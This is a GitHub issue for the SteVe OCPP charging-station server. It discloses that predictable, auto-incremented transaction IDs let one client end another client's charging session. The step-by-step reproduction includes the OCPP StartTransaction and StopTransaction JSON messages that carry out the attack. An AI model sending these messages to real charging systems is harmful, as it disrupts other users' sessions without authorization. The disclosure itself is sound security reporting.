steve icon indicating copy to clipboard operation
steve copied to clipboard

Published 20 hours ago verified publisher icon steve-community

Predictable Transaction ID Possible Vulnerability Allows Unauthorized Termination of OCPP Sessions

Open Tano-Coppoletta opened this issue 9 months ago • 4 comments

Checklist

  • [x] I checked other issues already, but found no answer/solution
  • [ ] I checked the documentation and wiki, but found no answer/solution
  • [ ] I am running the latest version and the issue still occurs
  • [x] I am sure that this issue is about SteVe (and not about the charging station software or something unrelated to SteVe)

Specifications

SteVe Version     : 3.6.0
Operating system  : Ubuntu 22.04.1
JDK               : openjdk version "11.0.20.1"
Database          : version 1.0.3

Docker Container Setup

Two Docker containers are set up to simulate two OCPP clients for testing purposes.

Issue Description

A possible security vulnerability was identified where unauthorized termination of transactions is possible due to predictable transaction Ids. The server issues a new transaction ID upon receiving an incomplete StartTransaction request and, due to the IDs being auto-incremented, an attacker can predict and use them to terminate other transactions.

Steps to Reproduce

  1. From the first Docker container (Client 1), a transaction is started: 
    [2,"1","StartTransaction", {
    "connectorId": 1,
    "idTag": "test",
    "meterStart": 20,
    "timestamp": "2023-09-03T12:34:56Z"
}]
  2. From the second Docker container (Client 2), a StartTransaction request with an empty idTag is sent to obtain a new transaction Id:
   [2, "1", "StartTransaction", {"idTag": ""}]
  1. Client 2 then sends a StopTransaction request using the new transaction ID minus 1:
[2, "1","StopTransaction", {
  "meterStop": 1,
  "timestamp": "2023-11-06T15:54:23Z",
  "transactionId": [Retrieved Transaction ID - 1],
  "reason": "EVDisconnected",
  "transactionData": [...]
}]

4.The unauthorized termination of Client 1's transaction is confirmed via the web interface. Screenshot from 2023-11-08 16-30-39

Expected behavior

The server should not issue a transaction ID for incomplete StartTransaction requests and should authenticate StopTransaction requests before processing.

Actual behavior

The server processes unauthorized StopTransaction requests using predicted transaction IDs.

Tano-Coppoletta avatar Nov 09 '23 18:11 Tano-Coppoletta